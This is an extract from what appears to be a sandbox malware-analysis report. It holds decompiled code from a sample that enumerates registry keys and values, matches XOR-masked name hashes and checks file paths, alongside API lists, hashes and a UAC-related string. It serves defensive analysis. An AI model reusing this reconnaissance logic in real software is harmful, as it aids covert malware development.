                                                                                                                                  				char* _t118;
                                                                                                                                  				intOrPtr* _t119;
                                                                                                                                  				CHAR* _t123;
                                                                                                                                  				void* _t125;
                                                                                                                                  				char* _t127;
                                                                                                                                  				intOrPtr* _t134;
                                                                                                                                  				void* _t136;
                                                                                                                                  				intOrPtr _t137;
                                                                                                                                  				signed int* _t146;
                                                                                                                                  				int** _t147;
                                                                                                                                  				void* _t160;
                                                                                                                                  				signed int _t163;
                                                                                                                                  				intOrPtr _t164;
                                                                                                                                  				void* _t165;
                                                                                                                                  				intOrPtr _t167;
                                                                                                                                  				intOrPtr _t172;
                                                                                                                                  				intOrPtr* _t173;
                                                                                                                                  				void* _t186;
                                                                                                                                  				intOrPtr _t187;
                                                                                                                                  				int* _t188;
                                                                                                                                  				void* _t190;
                                                                                                                                  				void* _t191;
                                                                                                                                  				char* _t192;
                                                                                                                                  				signed int _t194;
                                                                                                                                  				int* _t196;
                                                                                                                                  				void* _t202;
                                                                                                                                  				void* _t203;
                                                                                                                                  				void* _t204;
                                                                                                                                  				void* _t206;
                                                                                                                                  
                                                                                                                                   				_t165 = __ecx;
                                                                                                                                   				_t85 = _a8;
                                                                                                                                   				_t188 = 0;
                                                                                                                                   				_v16 = 0x104; // MAX_PATH: size of the subkey-name buffer handed to RegEnumKeyA
                                                                                                                                   				// Output parameters _a8.._a20 are zeroed up front so the caller sees a defined result on every path.
                                                                                                                                   				if(_t85 != 0) {
                                                                                                                                   					 *_t85 = 0;
                                                                                                                                   				}
                                                                                                                                   				_t86 = _a12;
                                                                                                                                   				if(_t86 != _t188) {
                                                                                                                                   					 *_t86 = _t188;
                                                                                                                                   				}
                                                                                                                                   				_t87 = _a16;
                                                                                                                                   				if(_t87 != _t188) {
                                                                                                                                   					 *_t87 = 0;
                                                                                                                                   				}
                                                                                                                                   				_t88 = _a20;
                                                                                                                                   				if(_t88 != _t188) {
                                                                                                                                   					 *_t88 = 0; // executed
                                                                                                                                   				}
                                                                                                                                   				_t89 = E00406DC2(_t165); // executed; target value compared against the masked subkey-name hashes below
                                                                                                                                   				_v32 = _t89;
                                                                                                                                   				_t160 = 0xe4;
                                                                                                                                   				// Produces the registry path in the buffer at 0x4122f8 from the data at 0x4106e8 (routine not shown in this section).
                                                                                                                                   				_t91 = E00402544(0x4122f8, 0x4106e8, 0x22, 0xe4, 0xc8);
                                                                                                                                   				_t204 = _t203 + 0x14;
                                                                                                                                   				// 0x80000002 = HKEY_LOCAL_MACHINE; 0x20119 = KEY_READ | KEY_WOW64_64KEY (64-bit registry view requested by this 32-bit process).
                                                                                                                                   				_t92 = RegOpenKeyExA(0x80000002, _t91, _t188, 0x20119,  &_v20); // executed
                                                                                                                                   				// Arguments for E0040EE2A: (0x4122f8, 0, 0x100), i.e. the path buffer is overwritten once the key is open.
                                                                                                                                   				_push(0x100);
                                                                                                                                   				_push(_t188);
                                                                                                                                   				_push(0x4122f8);
                                                                                                                                   				if(_t92 != 0) {
                                                                                                                                   					_t93 = E0040EE2A(_t165);
                                                                                                                                   					goto L66;
                                                                                                                                   				} else {
                                                                                                                                   					E0040EE2A(_t165);
                                                                                                                                   					_t206 = _t204 + 0xc;
                                                                                                                                   					// RegEnumKeyA arguments: index (_v24, starting at 0), name buffer (_v556), buffer size (_v16).
                                                                                                                                   					_push(_v16);
                                                                                                                                   					_push( &_v556);
                                                                                                                                   					_v24 = _t188;
                                                                                                                                   					_push(_t188);
                                                                                                                                   					while(1) {
                                                                                                                                   						_t97 = RegEnumKeyA(_v20, ??, ??, ??); // executed; any non-zero return (including ERROR_NO_MORE_ITEMS) ends the loop
                                                                                                                                   						if(_t97 != 0) {
                                                                                                                                   							break;
                                                                                                                                   						}
                                                                                                                                   						if(E00406CAD( &_v556) == 0) {
                                                                                                                                   							L41:
                                                                                                                                   							// Next subkey: advance the index and re-push the RegEnumKeyA arguments.
                                                                                                                                   							_v24 =  &(_v24[0]);
                                                                                                                                   							_push(0x104);
                                                                                                                                   							_v16 = 0x104;
                                                                                                                                   							_push( &_v556);
                                                                                                                                   							_push(_v24);
                                                                                                                                   							continue;
                                                                                                                                   						}
                                                                                                                                   						_t103 = E0040F1A5( &_v556); // hash of the subkey name (routine not shown in this section)
                                                                                                                                   						_pop(_t167);
                                                                                                                                   						// The subkey is selected only when its hash XOR 0x5e5e5e5e equals the target from E00406DC2.
                                                                                                                                   						if((_t103 ^ 0x5e5e5e5e) != _v32) {
                                                                                                                                   							goto L41;
                                                                                                                                   						}
                                                                                                                                   						_v12 = _t188;
                                                                                                                                   						_v16 = 0x104;
                                                                                                                                   						// 0x101 = KEY_QUERY_VALUE | KEY_WOW64_64KEY: open the matching subkey for value reads only.
                                                                                                                                   						_t107 = RegOpenKeyExA(_v20,  &_v556, _t188, 0x101,  &_v12);
                                                                                                                                   						if(_t107 != _t188) {
                                                                                                                                   							L45:
                                                                                                                                   							if(_t107 != 5) { // 5 = ERROR_ACCESS_DENIED
                                                                                                                                   								L50:
                                                                                                                                   								E0040EE2A(_t167, 0x4122f8, _t188, 0x100);
                                                                                                                                   								_t206 = _t206 + 0xc;
                                                                                                                                   								L39:
                                                                                                                                  								if(_v12 != _t188) {
                                                                                                                                  									RegCloseKey(_v12);
                                                                                                                                  								}
                                                                                                                                  								goto L41;
                                                                                                                                  							}
                                                                                                                                  							E0040EF00(_a16,  &_v556);
                                                                                                                                  							if(_v12 != _t188) {
                                                                                                                                  								RegCloseKey(_v12);
                                                                                                                                  							}
                                                                                                                                  							_push(4);
                                                                                                                                  							_pop(0);
                                                                                                                                  							L64:
                                                                                                                                  							RegCloseKey(_v20);
                                                                                                                                  							return 0;
                                                                                                                                  						}
                                                                                                                                  						_t118 = E00402544(0x4122f8, 0x4106dc, 0xa, _t160, 0xc8);
                                                                                                                                  						_t206 = _t206 + 0x14;
                                                                                                                                  						_t107 = RegQueryValueExA(_v12, _t118, _t188,  &_v36,  &_v296,  &_v16);
                                                                                                                                  						if(_t107 != _t188) {
                                                                                                                                  							goto L45;
                                                                                                                                  						}
                                                                                                                                  						_t119 =  &_v556;
                                                                                                                                  						_t186 = _t119 + 1;
                                                                                                                                  						do {
                                                                                                                                  							_t167 =  *_t119;
                                                                                                                                  							_t119 = _t119 + 1;
                                                                                                                                  						} while (_t167 != 0);
                                                                                                                                  						if(_v16 <= _t119 - _t186) {
                                                                                                                                  							goto L50;
                                                                                                                                  						}
                                                                                                                                  						_t123 = E0040EE95( &_v296,  &_v556);
                                                                                                                                  						_pop(_t167);
                                                                                                                                  						_v8 = _t123;
                                                                                                                                  						if(_t123 == _t188) {
                                                                                                                                  							goto L50;
                                                                                                                                  						}
                                                                                                                                  						_t125 = E0040EE95(_v8, E00402544(0x4122f8, 0x410694, 5, _t160, 0xc8));
                                                                                                                                  						_t206 = _t206 + 0x1c;
                                                                                                                                  						if(_t125 == 0) {
                                                                                                                                  							_t188 = 0;
                                                                                                                                  							goto L50;
                                                                                                                                  						}
                                                                                                                                  						if(_v296 != 0x22) {
                                                                                                                                  							_t127 = E0040ED03( &_v296, 0x20);
                                                                                                                                  							_pop(_t167);
                                                                                                                                  						} else {
                                                                                                                                  							E0040EF00( &_v296,  &_v295);
                                                                                                                                  							_t127 = E0040ED03( &_v296, 0x22);
                                                                                                                                  							_t206 = _t206 + 0x10;
                                                                                                                                  						}
                                                                                                                                  						if(_t127 != 0) {
                                                                                                                                  							 *_t127 = 0;
                                                                                                                                  						}
                                                                                                                                  						_v8 = E0040EE95( &_v296,  &_v556);
                                                                                                                                  						_v28 = E0040EE95(_v8, E00402544(0x4122f8, 0x410694, 5, _t160, 0xc8));
                                                                                                                                  						E0040EE2A(_t167, 0x4122f8, 0, 0x100);
                                                                                                                                  						_t134 = _a4;
                                                                                                                                  						_t206 = _t206 + 0x30;
                                                                                                                                  						_t190 = _t134 + 1;
                                                                                                                                  						do {
                                                                                                                                  							_t172 =  *_t134;
                                                                                                                                  							_t134 = _t134 + 1;
                                                                                                                                  						} while (_t172 != 0);
                                                                                                                                  						_t173 = _v8;
                                                                                                                                  						_t191 = _t134 - _t190;
                                                                                                                                  						_t43 = _t173 + 1; // 0x1
                                                                                                                                  						_t136 = _t43;
                                                                                                                                  						do {
                                                                                                                                  							_t187 =  *_t173;
                                                                                                                                  							_t173 = _t173 + 1;
                                                                                                                                  						} while (_t187 != 0);
                                                                                                                                  						_t174 = _t173 - _t136;
                                                                                                                                  						if(_t191 <= _t173 - _t136 || E0040ED77(_t191 - _t174 + _a4, _v8) != 0) {
                                                                                                                                  							_t192 = _v28;
                                                                                                                                  							 *_t192 = 0;
                                                                                                                                  							_t137 = E0040ED23(_v8, 0x5c);
                                                                                                                                  							_v8 = _t137;
                                                                                                                                  							if(_t137 != 0) {
                                                                                                                                  								_v8 = _v8 + 1;
                                                                                                                                  							} else {
                                                                                                                                  								_v8 =  &_v296;
                                                                                                                                  							}
                                                                                                                                  							if(E00406CAD(_v8) == 0) {
                                                                                                                                  								 *_t192 = 0x2e;
                                                                                                                                  								goto L38;
                                                                                                                                  							} else {
                                                                                                                                  								_t194 = E0040F1A5(_v8) ^ 0x5e5e5e5e;
                                                                                                                                  								_t163 = _t194 >> 0x00000008 & 0x000000ff;
                                                                                                                                  								 *_v28 = 0x2e;
                                                                                                                                  								if(E00406C96(_t194) != 0) {
                                                                                                                                  									L37:
                                                                                                                                  									_t160 = 0xe4;
                                                                                                                                  									L38:
                                                                                                                                  									_t188 = 0;
                                                                                                                                  									goto L39;
                                                                                                                                  								}
                                                                                                                                  								_t56 = _t163 - 0x51; // -81
                                                                                                                                  								if(_t56 > 0x2e || (_t194 & 0x000000ff) >= 0x10) {
                                                                                                                                  									goto L37;
                                                                                                                                  								} else {
                                                                                                                                  									_t196 = 0;
                                                                                                                                  									if(GetFileAttributesExA( &_v296, 0,  &_v592) != 0) {
                                                                                                                                  										_t196 = 1;
                                                                                                                                  									}
                                                                                                                                  									_t146 = _a8;
                                                                                                                                  									if(_t146 != 0) {
                                                                                                                                  										 *_t146 = _t163;
                                                                                                                                  									}
                                                                                                                                  									_t164 = _a16;
                                                                                                                                  									if(_t164 != 0) {
                                                                                                                                  										_t202 = _v8 -  &_v296;
                                                                                                                                  										E0040EE08(_t164,  &_v296, _t202);
                                                                                                                                  										 *((char*)(_t202 + _t164)) = 0;
                                                                                                                                  									}
                                                                                                                                  									if(_a20 != 0) {
                                                                                                                                  										E0040EF00(_a20, _v8);
                                                                                                                                  									}
                                                                                                                                  									_t147 = _a12;
                                                                                                                                  									if(_t147 != 0) {
                                                                                                                                  										 *_t147 = _t196;
                                                                                                                                  									}
                                                                                                                                  									_push(3);
                                                                                                                                  									_pop(0);
                                                                                                                                  									goto L63;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						} else {
                                                                                                                                  							E0040EF00(_a16,  &_v556);
                                                                                                                                  							L63:
                                                                                                                                  							RegCloseKey(_v12);
                                                                                                                                  							goto L64;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					_t93 = RegCloseKey(_v20); // executed
                                                                                                                                  					L66:
                                                                                                                                  					return _t93 | 0xffffffff;
                                                                                                                                  				}
                                                                                                                                  			}
                                                                                                                                  0x0040774b
                                                                                                                                  0x0040774d
                                                                                                                                  0x004077ec
                                                                                                                                  0x004077ef
                                                                                                                                  0x00000000
                                                                                                                                  0x004077f5
                                                                                                                                  0x0040751c
                                                                                                                                  0x00407521
                                                                                                                                  0x00407528
                                                                                                                                  0x00407530
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407536
                                                                                                                                  0x0040753c
                                                                                                                                  0x0040753f
                                                                                                                                  0x0040753f
                                                                                                                                  0x00407541
                                                                                                                                  0x00407542
                                                                                                                                  0x0040754b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040755f
                                                                                                                                  0x00407565
                                                                                                                                  0x00407566
                                                                                                                                  0x0040756b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407589
                                                                                                                                  0x0040758e
                                                                                                                                  0x00407593
                                                                                                                                  0x00407753
                                                                                                                                  0x00000000
                                                                                                                                  0x00407753
                                                                                                                                  0x004075a0
                                                                                                                                  0x004075d1
                                                                                                                                  0x004075d7
                                                                                                                                  0x004075a2
                                                                                                                                  0x004075b0
                                                                                                                                  0x004075be
                                                                                                                                  0x004075c3
                                                                                                                                  0x004075c3
                                                                                                                                  0x004075da
                                                                                                                                  0x004075dc
                                                                                                                                  0x004075dc
                                                                                                                                  0x004075fc
                                                                                                                                  0x00407615
                                                                                                                                  0x00407618
                                                                                                                                  0x0040761d
                                                                                                                                  0x00407620
                                                                                                                                  0x00407623
                                                                                                                                  0x00407626
                                                                                                                                  0x00407626
                                                                                                                                  0x00407628
                                                                                                                                  0x00407629
                                                                                                                                  0x0040762d
                                                                                                                                  0x00407632
                                                                                                                                  0x00407634
                                                                                                                                  0x00407634
                                                                                                                                  0x00407637
                                                                                                                                  0x00407637
                                                                                                                                  0x00407639
                                                                                                                                  0x0040763a
                                                                                                                                  0x0040763e
                                                                                                                                  0x00407642
                                                                                                                                  0x0040765c
                                                                                                                                  0x00407664
                                                                                                                                  0x00407667
                                                                                                                                  0x0040766e
                                                                                                                                  0x00407673
                                                                                                                                  0x00407680
                                                                                                                                  0x00407675
                                                                                                                                  0x0040767b
                                                                                                                                  0x0040767b
                                                                                                                                  0x0040768e
                                                                                                                                  0x00407722
                                                                                                                                  0x00000000
                                                                                                                                  0x00407694
                                                                                                                                  0x004076a1
                                                                                                                                  0x004076ad
                                                                                                                                  0x004076b3
                                                                                                                                  0x004076bf
                                                                                                                                  0x004076d8
                                                                                                                                  0x004076d8
                                                                                                                                  0x004076dd
                                                                                                                                  0x004076dd
                                                                                                                                  0x00000000
                                                                                                                                  0x004076dd
                                                                                                                                  0x004076c1
                                                                                                                                  0x004076c7
                                                                                                                                  0x00000000
                                                                                                                                  0x0040777e
                                                                                                                                  0x00407785
                                                                                                                                  0x00407797
                                                                                                                                  0x00407799
                                                                                                                                  0x00407799
                                                                                                                                  0x0040779a
                                                                                                                                  0x0040779f
                                                                                                                                  0x004077a1
                                                                                                                                  0x004077a1
                                                                                                                                  0x004077a3
                                                                                                                                  0x004077a8
                                                                                                                                  0x004077b3
                                                                                                                                  0x004077b8
                                                                                                                                  0x004077c0
                                                                                                                                  0x004077c0
                                                                                                                                  0x004077c8
                                                                                                                                  0x004077d0
                                                                                                                                  0x004077d6
                                                                                                                                  0x004077d7
                                                                                                                                  0x004077dc
                                                                                                                                  0x004077de
                                                                                                                                  0x004077de
                                                                                                                                  0x004077e0
                                                                                                                                  0x004077e2
                                                                                                                                  0x00000000
                                                                                                                                  0x004077e2
                                                                                                                                  0x004076c7
                                                                                                                                  0x00407769
                                                                                                                                  0x00407773
                                                                                                                                  0x004077e3
                                                                                                                                  0x004077e6
                                                                                                                                  0x00000000
                                                                                                                                  0x004077e6
                                                                                                                                  0x00407642
                                                                                                                                  0x00407717
                                                                                                                                  0x00407801
                                                                                                                                  0x00000000
                                                                                                                                  0x00407801

APIs
• RegOpenKeyExA.KERNELBASE(80000002,00000000,00020119,00000000,?,761B43E0,00000000), ref: 00407472
• RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00000101,?,?,?,?,?,?,?,761B43E0,00000000), ref: 004074F0
• RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,00000104,?,?,?,?,?,?,761B43E0,00000000), ref: 00407528
• ___ascii_stricmp.LIBCMT ref: 0040764D
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,761B43E0,00000000), ref: 004076E7
• RegEnumKeyA.ADVAPI32(00000000,00000000,?,00000104), ref: 00407706
• RegCloseKey.KERNELBASE(00000000,?,?,?,?,?,?,761B43E0,00000000), ref: 00407717
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,761B43E0,00000000), ref: 00407745
• RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,761B43E0,00000000), ref: 004077EF
  • Part of subcall function 0040F1A5: lstrlenA.KERNEL32(000000C8,000000E4,PromptOnSecureDesktop,000000C8,00407150,?), ref: 0040F1AD
• GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0040778F
• RegCloseKey.ADVAPI32(?), ref: 004077E6
Strings
Memory Dump Source
• Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: Close$Open$AttributesEnumFileQueryValue___ascii_stricmplstrlen
• String ID: "$PromptOnSecureDesktop
• API String ID: 3433985886-3108538426
• Opcode ID: f1bdd205be3518b321dbe0f69f041738494d7e4aaaefcefb02a6695f8730bb92
• Instruction ID: 2be8177c38fcb0431c37abdcb30432b02610efeff0693f38a05b2573c300e2d4
• Opcode Fuzzy Hash: f1bdd205be3518b321dbe0f69f041738494d7e4aaaefcefb02a6695f8730bb92
• Instruction Fuzzy Hash: E8C1F171D04209ABEB119BA5DC45BEF7BB9EF04310F1004B7F504B72D1EA79AE908B69
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 77%
                                                                                                                                  			E0040704C(intOrPtr _a4, signed int* _a8, int _a12, int _a16, int* _a20) {
                                                                                                                                  				CHAR* _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				int _v20;
                                                                                                                                  				char _v24;
                                                                                                                                  				char _v28;
                                                                                                                                  				signed int _v32;
                                                                                                                                  				char _v64;
                                                                                                                                  				char _v363;
                                                                                                                                  				char _v364;
                                                                                                                                  				void _v400;
                                                                                                                                  				intOrPtr* _t88;
                                                                                                                                  				int* _t89;
                                                                                                                                  				int* _t90;
                                                                                                                                  				int* _t91;
                                                                                                                                  				char* _t93;
                                                                                                                                  				long _t94;
                                                                                                                                  				signed int _t96;
                                                                                                                                  				signed int _t97;
                                                                                                                                  				long _t99;
                                                                                                                                  				signed int _t107;
                                                                                                                                  				int _t109;
                                                                                                                                  				int _t119;
                                                                                                                                  				int _t121;
                                                                                                                                  				int _t122;
                                                                                                                                  				int _t123;
                                                                                                                                  				signed int _t125;
                                                                                                                                  				signed int* _t130;
                                                                                                                                  				int _t136;
                                                                                                                                  				int _t149;
                                                                                                                                  				int _t155;
                                                                                                                                  				void* _t158;
                                                                                                                                  				signed int _t166;
                                                                                                                                  				int _t196;
                                                                                                                                  				signed int _t204;
                                                                                                                                  				int _t206;
                                                                                                                                  				void* _t207;
                                                                                                                                  				void* _t208;
                                                                                                                                  				void* _t210;
                                                                                                                                  				void* _t211;
                                                                                                                                  
                                                                                                                                  				_t88 = _a8;
                                                                                                                                  				_t167 = 0;
                                                                                                                                  				_v16 = 0x12c;
                                                                                                                                  				_v24 = 0x20;
                                                                                                                                  				_v364 = 0;
                                                                                                                                  				if(_t88 != 0) {
                                                                                                                                  					 *_t88 = 0;
                                                                                                                                  				}
                                                                                                                                  				_t89 = _a12;
                                                                                                                                  				if(_t89 != _t167) {
                                                                                                                                  					 *_t89 = _t167;
                                                                                                                                  				}
                                                                                                                                  				_t90 = _a16;
                                                                                                                                  				if(_t90 != _t167) {
                                                                                                                                  					 *_t90 = _t167;
                                                                                                                                  				}
                                                                                                                                  				_t91 = _a20;
                                                                                                                                  				if(_t91 != _t167) {
                                                                                                                                  					 *_t91 = _t167;
                                                                                                                                  				}
                                                                                                                                  				_t93 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
                                                                                                                                  				_t208 = _t207 + 0x14;
                                                                                                                                  				_t94 = RegOpenKeyExA(0x80000001, _t93, _t167, 0x101,  &_v12); // executed
                                                                                                                                  				if(_t94 != 0) {
                                                                                                                                  					L21:
                                                                                                                                  					_t96 = E0040EE2A(_t167, 0x4122f8, 0, 0x100) | 0xffffffff;
                                                                                                                                  					goto L22;
                                                                                                                                  				} else {
                                                                                                                                  					_t97 = E00406DC2(_t167);
                                                                                                                                  					_push( &_v16);
                                                                                                                                  					_push( &_v364);
                                                                                                                                  					_push( &_v28);
                                                                                                                                  					_v32 = _t97;
                                                                                                                                  					_push(0);
                                                                                                                                  					_push( &_v24);
                                                                                                                                  					_t167 =  &_v64;
                                                                                                                                  					_push( &_v64);
                                                                                                                                  					_v8 = 0;
                                                                                                                                  					_push(0);
                                                                                                                                  					while(1) {
                                                                                                                                  						_t99 = RegEnumValueA(_v12, ??, ??, ??, ??, ??, ??, ??); // executed
                                                                                                                                  						if(_t99 == 0x103) {
                                                                                                                                  							break;
                                                                                                                                  						}
                                                                                                                                  						__eflags = _t99;
                                                                                                                                  						if(_t99 != 0) {
                                                                                                                                  							L18:
                                                                                                                                  							_t25 =  &_v8;
                                                                                                                                  							 *_t25 =  &(_v8[1]);
                                                                                                                                  							__eflags =  *_t25;
                                                                                                                                  							_push( &_v16);
                                                                                                                                  							_push( &_v364);
                                                                                                                                  							_push( &_v28);
                                                                                                                                  							_push(0);
                                                                                                                                  							_push( &_v24);
                                                                                                                                  							_push( &_v64);
                                                                                                                                  							_push(_v8);
                                                                                                                                  							_v16 = 0x12c;
                                                                                                                                  							_v24 = 0x20;
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  						__eflags = _v24 - _t99;
                                                                                                                                  						if(_v24 <= _t99) {
                                                                                                                                  							goto L18;
                                                                                                                                  						}
                                                                                                                                  						__eflags = _v16 - _t99;
                                                                                                                                  						if(_v16 <= _t99) {
                                                                                                                                  							goto L18;
                                                                                                                                  						}
                                                                                                                                  						__eflags = _v28 - 1;
                                                                                                                                  						if(_v28 != 1) {
                                                                                                                                  							goto L18;
                                                                                                                                  						}
                                                                                                                                  						_t107 = E0040EED1( &_v64, E00402544(0x4122f8,  &E004106A0, 9, 0xe4, 0xc8));
                                                                                                                                  						_t210 = _t208 + 0x1c;
                                                                                                                                  						asm("sbb eax, eax");
                                                                                                                                  						_t109 =  ~_t107 + 1;
                                                                                                                                  						__eflags = _t109;
                                                                                                                                  						_v20 = _t109;
                                                                                                                                  						if(_t109 != 0) {
                                                                                                                                  							L23:
                                                                                                                                  							_v8 = E0040EE95( &_v364, E00402544(0x4122f8,  &E0041069C, 4, 0xe4, 0xc8));
                                                                                                                                  							E0040EE2A(_t167, 0x4122f8, 0, 0x100);
                                                                                                                                  							_t211 = _t210 + 0x28;
                                                                                                                                  							__eflags = _v8;
                                                                                                                                  							if(_v8 == 0) {
                                                                                                                                  								__eflags = _v364 - 0x22;
                                                                                                                                  								if(_v364 == 0x22) {
                                                                                                                                  									E0040EF00( &_v364,  &_v363);
                                                                                                                                  									_t149 = E0040ED23( &_v364, 0x22);
                                                                                                                                  									_t211 = _t211 + 0x10;
                                                                                                                                  									__eflags = _t149;
                                                                                                                                  									if(_t149 != 0) {
                                                                                                                                  										 *_t149 = 0;
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  								_t196 = E0040EE95( &_v364, E00402544(0x4122f8, 0x410694, 5, 0xe4, 0xc8));
                                                                                                                                  								E0040EE2A(_t167, 0x4122f8, 0, 0x100);
                                                                                                                                  								__eflags = _t196;
                                                                                                                                  								if(_t196 != 0) {
                                                                                                                                  									_t119 = E0040ED77( &_v364, _a4);
                                                                                                                                  									__eflags = _t119;
                                                                                                                                  									if(_t119 != 0) {
                                                                                                                                  										 *_t196 = 0;
                                                                                                                                  										_t121 = E0040ED23( &_v364, 0x5c);
                                                                                                                                  										_v8 = _t121;
                                                                                                                                  										__eflags = _t121;
                                                                                                                                  										if(_t121 != 0) {
                                                                                                                                  											_t63 =  &_v8;
                                                                                                                                  											 *_t63 =  &(_v8[1]);
                                                                                                                                  											__eflags =  *_t63;
                                                                                                                                  										} else {
                                                                                                                                  											_v8 =  &_v364;
                                                                                                                                  										}
                                                                                                                                  										_t122 = E00406CAD(_v8);
                                                                                                                                  										__eflags = _t122;
                                                                                                                                  										if(_t122 != 0) {
                                                                                                                                  											_pop(_t204);
                                                                                                                                  											_push(0x8b00007e);
                                                                                                                                  											asm("lock xor esi, 0x55555555");
                                                                                                                                  											_v16 = _t204;
                                                                                                                                  											_t166 = _t204 >> 0x00000008 & 0x000000ff;
                                                                                                                                  											_t123 = E00406C96(_t204);
                                                                                                                                  											__eflags = _t123;
                                                                                                                                  											if(_t123 != 0) {
                                                                                                                                  												L57:
                                                                                                                                  												RegCloseKey(_v12);
                                                                                                                                  												__eflags = _a16;
                                                                                                                                  												if(_a16 != 0) {
                                                                                                                                  													E0040EF00(_a16,  &_v64);
                                                                                                                                  												}
                                                                                                                                  												_t125 = 0;
                                                                                                                                  												__eflags = _v20;
                                                                                                                                  												 *_t196 = 0x2e;
                                                                                                                                  												goto L34;
                                                                                                                                  											}
                                                                                                                                  											__eflags = _t166 - 0x40 - 0x3f;
                                                                                                                                  											if(_t166 - 0x40 > 0x3f) {
                                                                                                                                  												goto L57;
                                                                                                                                  											}
                                                                                                                                  											__eflags = (_t204 & 0x000000ff) - 0x10;
                                                                                                                                  											if((_t204 & 0x000000ff) >= 0x10) {
                                                                                                                                  												goto L57;
                                                                                                                                  											}
                                                                                                                                  											_t206 = _a12;
                                                                                                                                  											 *_t196 = 0x2e;
                                                                                                                                  											__eflags = _t206;
                                                                                                                                  											if(_t206 != 0) {
                                                                                                                                  												_t136 = GetFileAttributesExA( &_v364, 0,  &_v400);
                                                                                                                                  												__eflags = _t136;
                                                                                                                                  												if(_t136 != 0) {
                                                                                                                                  													 *_t206 = 1;
                                                                                                                                  												}
                                                                                                                                  											}
                                                                                                                                  											_t130 = _a8;
                                                                                                                                  											__eflags = _t130;
                                                                                                                                  											if(_t130 != 0) {
                                                                                                                                  												 *_t130 = _t166;
                                                                                                                                  											}
                                                                                                                                  											__eflags = _a16;
                                                                                                                                  											if(_a16 != 0) {
                                                                                                                                  												E0040EF00(_a16,  &_v64);
                                                                                                                                  											}
                                                                                                                                  											__eflags = _a20;
                                                                                                                                  											if(_a20 != 0) {
                                                                                                                                  												E0040EF00(_a20, _v8);
                                                                                                                                  											}
                                                                                                                                  											_t125 = 0;
                                                                                                                                  											__eflags = _v20;
                                                                                                                                  											goto L34;
                                                                                                                                  										} else {
                                                                                                                                  											RegCloseKey(_v12);
								__eflags = _a16;
								if(_a16 != 0) {
									E0040EF00(_a16,  &_v64);
								}
								 *_t196 = 0x2e;
								goto L33;
							}
						}
						RegCloseKey(_v12);
						_t96 = 0;
						goto L22;
					} else {
						RegCloseKey(_v12);
						__eflags = _a16;
						if(_a16 != 0) {
							E0040EF00(_a16,  &_v64);
						}
						L33:
						_t125 = 0;
						__eflags = _v20;
						L34:
						_t96 = (_t125 & 0xffffff00 | __eflags == 0x00000000) + 1;
						L22:
						return _t96;
					}
				}
				RegCloseKey(_v12);
				__eflags = _a16;
				if(_a16 != 0) {
					E0040EF00(_a16,  &_v64);
				}
				_t96 = 1;
				goto L22;
			}
			_t155 = E00406CAD( &_v64);
			_pop(_t167);
			__eflags = _t155;
			if(_t155 == 0) {
				L17:
				E0040EE2A(_t167, 0x4122f8, 0, 0x100);
				_t208 = _t210 + 0xc;
				goto L18;
			}
			_t158 = E0040F1A5( &_v64);
			_t167 = _v32 ^ 0x5e5e5e5e;
			__eflags = _t158 - (_v32 ^ 0x5e5e5e5e);
			if(_t158 == (_v32 ^ 0x5e5e5e5e)) {
				goto L23;
			}
			goto L17;
		}
		RegCloseKey(_v12); // executed
		goto L21;
	}
}
[Instruction address column for this function (198 entries, 0x00407055 through 0x004073f7, with 0x00000000 for lines that carry no address), detached from the decompiled listing above during extraction; the per-line pairing is not recoverable here.]
                                                                                                                                  0x00407208
                                                                                                                                  0x0040720e
                                                                                                                                  0x00407212
                                                                                                                                  0x0040721b
                                                                                                                                  0x00407221
                                                                                                                                  0x00407224
                                                                                                                                  0x00000000
                                                                                                                                  0x00407224
                                                                                                                                  0x0040713d
                                                                                                                                  0x00407142
                                                                                                                                  0x00407143
                                                                                                                                  0x00407145
                                                                                                                                  0x0040715e
                                                                                                                                  0x00407166
                                                                                                                                  0x0040716b
                                                                                                                                  0x00000000
                                                                                                                                  0x0040716b
                                                                                                                                  0x0040714b
                                                                                                                                  0x00407154
                                                                                                                                  0x0040715a
                                                                                                                                  0x0040715c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040715c
                                                                                                                                  0x004071b2
                                                                                                                                  0x00000000
                                                                                                                                  0x004071b2

APIs
• RegOpenKeyExA.KERNELBASE(80000001,00000000,00000101,761B43E0,?,761B43E0,00000000), ref: 004070C2
• RegEnumValueA.KERNELBASE(761B43E0,00000000,?,00000020,00000000,00000000,00000000,0000012C), ref: 0040719E
• RegCloseKey.KERNELBASE(761B43E0,?,761B43E0,00000000), ref: 004071B2
• RegCloseKey.ADVAPI32(761B43E0), ref: 00407208
• RegCloseKey.ADVAPI32(761B43E0), ref: 00407291
• ___ascii_stricmp.LIBCMT ref: 004072C2
• RegCloseKey.ADVAPI32(761B43E0), ref: 004072D0
• RegCloseKey.ADVAPI32(761B43E0), ref: 00407314
• GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0040738D
• RegCloseKey.ADVAPI32(761B43E0), ref: 004073D8
  • Part of subcall function 0040F1A5: lstrlenA.KERNEL32(000000C8,000000E4,PromptOnSecureDesktop,000000C8,00407150,?), ref: 0040F1AD
Strings
Memory Dump Source
• Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
